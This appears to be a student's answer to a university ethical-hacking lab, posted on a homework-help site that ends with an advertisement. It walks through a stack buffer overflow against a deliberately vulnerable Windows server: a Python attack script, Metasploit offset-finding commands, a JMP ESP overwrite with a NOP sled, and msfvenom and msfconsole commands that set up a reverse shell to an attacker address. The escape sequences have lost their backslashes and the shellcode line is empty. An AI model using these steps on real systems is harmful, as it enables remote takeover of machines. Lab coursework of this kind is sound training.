CSI3208 Ethical Hacking and Defence | Network Configuration
Task
Preparation
- Open Kali virtual machine
- Open Win32 Buffer Victim virtual machine
- Ensure both are set to NAT networking
- Check the IP addresses on both
Answer:
Exploit Development
The workshop is created for learning lesson on ethical hacking and defence using two virtual machines. In the workshop two machines are created in VmWare one is kali linux used for performing the attack and one is a windows client machine. In the network configuration both of the machines are configured to NAT such that the machines can communicate with the private and the public address and the Ip address is checked for each of the machine. Thus the preparation stage is completed.
In the finding and overflow stage immunity debugger is installed in the windows machine and a file server.exe is loaded in the immunity debugger and executed by pressing F9. In the kali linux a file is created with the name attack.py and the following codes given in the workshop is inputted in the file.
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# Testing
buffer = "x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
In the kali linux virtual machine the command ‘python attack.py IP_ADDRESS 1337’ is executed and in the IP address field the IP address of the victim machine is inputted. The windows environment is opened for passing the exception for its execution and the following screen appears with similar type of values. The value of the EIP and the EBP is changed to the values inputted by the attacker and the ESP point pointing to the different memory region contains the value injected from the attacker machine.
In the stage of weaponizing the vulnerability the immunity debugger installed in the victim machine is used for restarting the server.exe and starting its execution. In the kali virtual machine the Metasploit tool is used for performing an exploit on the network and it is done by running the following command.
“cd /usr/share/metasploit-framework/tools/exploit”, followed by
“./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337”.
Here also the IP address of the victim machine is inputted for performing the exploitation and identification of the vulnerability of the machine. The exception is passed on the victim machine and the resultant value of EIP is noted. The following command is used for the identification of the offset value for EIP:
“./pattern_offset.rb -l 5000 -q 37694136”
The result is noted and an address for the code is used for jumping to the ESP and the server.exe is restarted and the execution is started. After starting the execution the executable modules are viewed and searched for JMP ESP for finding the result of GDI32. The memory address is noted and the code of the attack.py is modified using the following command.
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
A shell code is developed in Kali linux using the following command
“msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python”
The attack.py file is modified for the inclusion of the shellcode generated form the above command.
For the exploitation the following command is used
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit"
The immunity debugger is closed and the server.exe is opened in the victim machine and on the linux the following command is executed
“python attack.py IP_ADDRESS 1337”
Bibliography
Li, C. (2015). Penetration testing curriculum development in practice. Journal of Information Technology Education: Innovations in Practice, 14(1), 85-99.
Rao, G. S., Kumar, P. N., Swetha, P., & BhanuKiran, G. (2014, December). Security assessment of computer networks-an ethical hacker's perspective. In Computer and Communications Technologies (ICCCT), 2014 International Conference on (pp. 1-5). IEEE.
Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. In Proceedings of The 28th Australasian Conference on Information Systems, December(pp. 4-6).
Yaghmaei, E., van de Poel, I., Christen, M., Gordijn, B., Kleine, N., Loi, M., ... & Weber, K. (2017). Canvas White Paper 1–Cybersecurity and Ethics.
Buy CSI3208 Ethical Hacking and Defence | Network Configuration Answers Online
Talk to our expert to get the help with CSI3208 Ethical Hacking and Defence | Network Configuration Answers to complete your assessment on time and boost your grades now
The main aim/motive of the management assignment help services is to get connect with a greater number of students, and effectively help, and support them in getting completing their assignments the students also get find this a wonderful opportunity where they could effectively learn more about their topics, as the experts also have the best team members with them in which all the members effectively support each other to get complete their diploma assignments. They complete the assessments of the students in an appropriate manner and deliver them back to the students before the due date of the assignment so that the students could timely submit this, and can score higher marks. The experts of the assignment help services at urgenthomework.com are so much skilled, capable, talented, and experienced in their field of programming homework help writing assignments, so, for this, they can effectively write the best economics assignment help services.
